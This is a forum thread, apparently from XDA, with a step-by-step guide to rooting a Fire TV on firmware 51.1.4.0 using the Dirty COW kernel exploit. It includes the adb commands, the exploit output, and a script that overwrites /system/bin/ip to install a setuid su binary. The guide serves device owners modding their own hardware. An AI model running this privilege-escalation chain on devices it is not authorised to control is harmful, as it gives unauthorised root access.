    EDIT2: Upon request the hint from the later pages: Instead of playing a video to sync changes to flash (short before the first script finishes, it seems to be more effective to fill the memory with artificial content until completely full. This can be done with a memory filling App, see https://xdaforums.com/showpost.php?p=73766497&postcount=157 and https://xdaforums.com/showpost.php?p=73838299&postcount=163.
    View
    7
    slater_g
    slater_g
    Alright, here are my step-by-step instructions. All credits go to @christofsteel and of course @rbox

    Do this at your own risk!!!

    Note 1: My dirtycow file differs from the one @Anutter226 uploaded. It seems to me that he uploaded the "arm" version while I used the "arm-v7a" version. I did not try his but it might also work similarly.

    Note 2: I did this all starting on firmware 51.1.4.0. I do not know if it works with other fimwares.

    Note 3: Maybe this also works with a Fire TV Stick. At least I did everything over WiFi on the Box just fine.

    1. Make sure you have adb installed and working.
    2. Find out your Fire TV's IP address. I had mine set to use DHCP (dynamic IP).
    3. Connect to your Fire TV (replace with your Fire TV IP) with ADB in the terminal or commandline:
      Code: 
      adb connect 192.168.0.111
    4. Download and extract my files to some directory.
    5. Navigate to that directory in the terminal.
    6. Copy the three files to the Fire TV with the following three commands:
      Code: 
      adb push dirtycow /data/local/tmp
adb push su /data/local/tmp
adb push ip_script /data/local/tmp
    7. Now, log into the adb shell on the Fire TV:
      Code: 
      adb shell
    8. You are now logged into the shell of the Fire TV, indicated by a $ in the new line.
    9. Make the ip_script executable with this command:
      Code: 
      chmod 755 /data/local/tmp/ip_script
    10. Make the exploit executable with this command:
      Code: 
      chmod 755 /data/local/tmp/dirtycow
    11. Copy the original "ip" binary of the Fire TV to the temp folder:
      Code: 
      cp /system/bin/ip /data/local/tmp
    12. Now it is time to run the exploit. As stated in the OP, this might take some time like 5 to 10 minutes:
      Code: 
      ./dirtycow /system/bin/ip ip_script
    13. When it's done, it should show something like this (exact numbers not important here):
      Code: 
      [ *] mmap 0xb51e5000
[ *] exploit (patch)
[ *] currently 0xb51e5000=464c457f
[ *] madvise = 0xb51e5000 17944
[ *] madvise = 0 1048576
[ *] /proc/self/mem 1635778560 1048576
[ *] exploited 0xb51e5000=464c457f
    14. By the way: This step is permanent. So if you reboot the Fire TV, you do not have to do this again.
    15. Optional: You can check if the exploit was executed correctly by typing:
      Code: 
      cat /system/bin/ip
    16. This should give you this:
      Code: 
      #!/system/bin/sh
mount -o remount,rw /system
cp /data/local/tmp/su /system/xbin
chmod 4755 /system/xbin/su    
/data/local/tmp/ip "$@"
    17. End of optional part.
    18. Now you can exit the adb shell with:
      Code: 
      exit
    19. Next you have to trigger the exploit: Go into the settings of your Fire TV and use a static IP. There should be somewhere an "advanced" button to set this. I did this via WiFi and to get a static IP I had to "forget" the current WiFi, then select it again, type the passwort and (important) before confirming the password, the "advanced" button was at the bottom of the password dialog.
    20. Set the IP, Gateway, DNS1, DNS2 and some length setting that I set to 24 according to what works in your network. I used a different IP address than before; don't know if that matters.
    21. The Fire TV should now be connected to the network again.
    22. Head back to your terminal and connect again (replace IP with your Fire TV's new static IP):
      Code: 
      adb connect 192.168.0.222
    23. Now, log into the adb shell on the Fire TV:
      Code: 
      adb shell
    24. Test the superuser access:
      Code: 
      su
    25. There should now be a # instead of a $. Therefore you have root!
    26. Now you can continue with downgrading. For this, follow this guide http://www.aftvnews.com/start/ and select the Fire TV 1 (2014) -> Yes -> 51.1.1.0 (not your FW, but that leads to the correct guide)
    27. Start with 4. of the guide to downgrade and follow along with 5., 6. and 7.
    28. Go the the next page of the guide and do steps 2. to 6.
    29. Step 7. of that page is outdated. Instead install TWRP http://xdaforums.com/fire-tv/development/firetv-1-bueller-twrp-recovery-t3383286
    30. After that, install the newest ROM from TRWP. ROM can be found here: http://xdaforums.com/fire-tv/development/prerooted-stock-images-t2882337

    Happy flashing!
    View
    6
    T
    tehlers
    Just for the record: We successfully rooted the stick from @Spider1996. All changes needed are in the updated file on androidfilehost.com in post: #109
    View
    4
    slater_g
    slater_g
    Also succeeded with a Fire TV Box Gen 1 on 51.1.4.0.
    Can post the binaries and longer tutorial if needed.
    Also downgraded to 51.1.0.2, rooted with TowelRoot and did a full bootloader unlock.
    View

New posts